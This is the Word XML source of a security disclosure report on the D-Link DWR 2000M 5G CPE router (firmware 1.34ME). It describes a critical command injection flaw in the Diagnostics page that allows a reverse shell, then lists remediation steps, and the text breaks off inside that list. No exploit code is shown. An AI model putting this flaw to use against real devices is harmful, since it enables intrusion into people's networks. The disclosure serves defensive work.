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AA5C7" w14:textId="77777777" w:rsidR="00160C8B" w:rsidRPr="00ED01C1" w:rsidRDefault="00160C8B" w:rsidP="00160C8B">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="480" w:lineRule="atLeast"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F1111"/>
          <w:kern w:val="36"/>
          <w:sz w:val="50"/>
          <w:szCs w:val="50"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED01C1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F1111"/>
          <w:kern w:val="36"/>
          <w:sz w:val="50"/>
          <w:szCs w:val="50"/>
        </w:rPr>
        <w:t>DWR 2000M 5G</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED01C1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F1111"/>
          <w:kern w:val="36"/>
          <w:sz w:val="50"/>
          <w:szCs w:val="50"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (CPE)  Multiple Security Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548677AB" w14:textId="77777777" w:rsidR="00160C8B" w:rsidRPr="00ED01C1" w:rsidRDefault="00160C8B" w:rsidP="00160C8B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45A9B3B0" w14:textId="77777777" w:rsidR="00160C8B" w:rsidRPr="00ED01C1" w:rsidRDefault="00160C8B" w:rsidP="00160C8B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A5F353D" w14:textId="77777777" w:rsidR="00160C8B" w:rsidRPr="00ED01C1" w:rsidRDefault="00160C8B" w:rsidP="00160C8B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED01C1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CAA8FB0" wp14:editId="365746ED">
            <wp:extent cx="1969477" cy="3465651"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="1060598135" name="Picture 1" descr="DWR 2000M 5G AX1800 router with 4 x Gigabit LAN ports, 1 x Gigabit WAN port, 1 x FXS port, 1 x USB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R 2000M 5G AX1800 router with 4 x Gigabit LAN ports, 1 x Gigabit WAN port, 1 x FXS port, 1 x USB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2995" cy="3542228"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="518A37E1" w14:textId="77777777" w:rsidR="00160C8B" w:rsidRPr="00ED01C1" w:rsidRDefault="00160C8B" w:rsidP="00160C8B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E8EA0F5" w14:textId="77777777" w:rsidR="00160C8B" w:rsidRPr="00ED01C1" w:rsidRDefault="00160C8B" w:rsidP="00160C8B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>09-Feb-2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C1B844" w14:textId="77777777" w:rsidR="00160C8B" w:rsidRPr="00ED01C1" w:rsidRDefault="00160C8B" w:rsidP="00160C8B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22C6B357" w14:textId="77777777" w:rsidR="00160C8B" w:rsidRPr="00ED01C1" w:rsidRDefault="00160C8B" w:rsidP="00160C8B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BDAD1A5" w14:textId="77777777" w:rsidR="00160C8B" w:rsidRDefault="00160C8B" w:rsidP="00160C8B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54A97F65" w14:textId="77777777" w:rsidR="00160C8B" w:rsidRDefault="00160C8B" w:rsidP="00160C8B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05891CC3" w14:textId="77777777" w:rsidR="00160C8B" w:rsidRDefault="00160C8B" w:rsidP="00160C8B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78211ADC" w14:textId="77777777" w:rsidR="00160C8B" w:rsidRDefault="00160C8B" w:rsidP="00160C8B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="291068B4" w14:textId="77777777" w:rsidR="00160C8B" w:rsidRDefault="00160C8B" w:rsidP="00160C8B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="758D81C0" w14:textId="77777777" w:rsidR="00160C8B" w:rsidRDefault="00160C8B" w:rsidP="00160C8B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50B7A413" w14:textId="77777777" w:rsidR="00160C8B" w:rsidRDefault="00160C8B" w:rsidP="00160C8B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="301E5A86" w14:textId="77777777" w:rsidR="00160C8B" w:rsidRDefault="00160C8B" w:rsidP="00160C8B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1783968E" w14:textId="77777777" w:rsidR="00160C8B" w:rsidRDefault="00160C8B" w:rsidP="00160C8B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E339131" w14:textId="77777777" w:rsidR="00160C8B" w:rsidRDefault="00160C8B" w:rsidP="00160C8B">
      <w:pPr>
        <w:ind w:left="-426"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B55C2D8" w14:textId="77777777" w:rsidR="00160C8B" w:rsidRPr="00ED01C1" w:rsidRDefault="00160C8B" w:rsidP="00160C8B">
      <w:pPr>
        <w:ind w:left="-426"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74209B3A" w14:textId="77777777" w:rsidR="00160C8B" w:rsidRPr="00ED01C1" w:rsidRDefault="00160C8B" w:rsidP="00160C8B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="10782" w:type="dxa"/>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6115"/>
      </w:tblGrid>
      <w:tr w:rsidR="00160C8B" w:rsidRPr="00ED01C1" w14:paraId="5970B06E" w14:textId="77777777" w:rsidTr="00F85CCD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4667" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21EFFA35" w14:textId="77777777" w:rsidR="00160C8B" w:rsidRPr="00ED01C1" w:rsidRDefault="00160C8B" w:rsidP="00F85CCD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED01C1">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Submitted By </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6115" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E5E79BB" w14:textId="77777777" w:rsidR="00160C8B" w:rsidRPr="00ED01C1" w:rsidRDefault="00160C8B" w:rsidP="00F85CCD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00160C8B" w:rsidRPr="00ED01C1" w14:paraId="0815A863" w14:textId="77777777" w:rsidTr="00F85CCD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4667" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="532D6053" w14:textId="77777777" w:rsidR="00160C8B" w:rsidRDefault="00160C8B" w:rsidP="00F85CCD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED01C1">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Vinod Kumar Shrimalii (mrnmap)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0ED52D5E" w14:textId="77777777" w:rsidR="00160C8B" w:rsidRPr="00ED01C1" w:rsidRDefault="00160C8B" w:rsidP="00F85CCD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00ED01C1">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Nayab Keshodwala (NK)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6115" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="233A2121" w14:textId="77777777" w:rsidR="00160C8B" w:rsidRPr="00ED01C1" w:rsidRDefault="00160C8B" w:rsidP="00F85CCD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="41E996B0" w14:textId="77777777" w:rsidR="00160C8B" w:rsidRPr="00ED01C1" w:rsidRDefault="00160C8B" w:rsidP="00160C8B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D29D239" w14:textId="77777777" w:rsidR="00160C8B" w:rsidRPr="00ED01C1" w:rsidRDefault="00160C8B" w:rsidP="00160C8B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED01C1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>NAME OF AFFECTED PRODUCT(S) AND VERSION(S)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18729B11" w14:textId="77777777" w:rsidR="00160C8B" w:rsidRPr="00ED01C1" w:rsidRDefault="00160C8B" w:rsidP="00160C8B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FB3A427" w14:textId="77777777" w:rsidR="00160C8B" w:rsidRPr="00E9327B" w:rsidRDefault="00160C8B" w:rsidP="00160C8B">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Model:   </w:t>
      </w:r>
      <w:r w:rsidRPr="00531117">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">DLink </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">DWR </w:t>
      </w:r>
      <w:r w:rsidRPr="00531117">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2000M 5G CPE</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED01C1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>With Wifi 6 Ax1800</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3C2F8B" w14:textId="29AD693A" w:rsidR="00160C8B" w:rsidRDefault="00160C8B" w:rsidP="00160C8B">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Version: </w:t>
      </w:r>
      <w:r w:rsidRPr="00531117">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DWR-2000M_1.34ME</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7F7DD1" w14:textId="77777777" w:rsidR="00160C8B" w:rsidRDefault="00160C8B" w:rsidP="00807043">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B324B31" w14:textId="77777777" w:rsidR="00807043" w:rsidRDefault="00807043" w:rsidP="00807043">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F2833">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Remote Code execution with admin privilege </w:t>
      </w:r>
      <w:r w:rsidRPr="009B2CB3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CRITICAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337B7B0E" w14:textId="77777777" w:rsidR="00807043" w:rsidRPr="00027BD3" w:rsidRDefault="00807043" w:rsidP="00807043">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00027BD3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The discovery of a command injection vulnerability in the "Diagnostics" utility page of the Dlink 5G CPE firmware has escalated concerns due to the additional risk of reverse shell attacks. Exploiting this vulnerability not only allows arbitrary execution of system commands but also facilitates the establishment of a reverse shell, providing attackers with un</w:t>
      </w:r>
      <w:r w:rsidRPr="00027BD3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00027BD3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>authorized remote access to the device. Urgent measures are necessary to mitigate these risks effectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232CA347" w14:textId="77777777" w:rsidR="00807043" w:rsidRDefault="00807043" w:rsidP="00807043">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02809072" w14:textId="77777777" w:rsidR="00807043" w:rsidRDefault="00807043" w:rsidP="00807043">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00154ABA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Recommendation </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19321AFE" w14:textId="77777777" w:rsidR="00807043" w:rsidRPr="00EB113C" w:rsidRDefault="00807043" w:rsidP="00807043">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="324230E2" w14:textId="77777777" w:rsidR="00807043" w:rsidRPr="00027BD3" w:rsidRDefault="00807043" w:rsidP="00807043">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00027BD3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Prioritize the development and deployment of patches to address the command injection vulnerability in the Dlink 5G CPE firmware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305A17D5" w14:textId="77777777" w:rsidR="00807043" w:rsidRPr="00027BD3" w:rsidRDefault="00807043" w:rsidP="00807043">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00027BD3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Implement immediate remediation measures to prevent further exploitation, including temporarily disabling the affected utility page if necessary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B511608" w14:textId="77777777" w:rsidR="00807043" w:rsidRPr="00027BD3" w:rsidRDefault="00807043" w:rsidP="00807043">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00027BD3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Enhanced Input Validation and Filtering:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C6E79B" w14:textId="77777777" w:rsidR="00807043" w:rsidRPr="00027BD3" w:rsidRDefault="00807043" w:rsidP="00807043">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
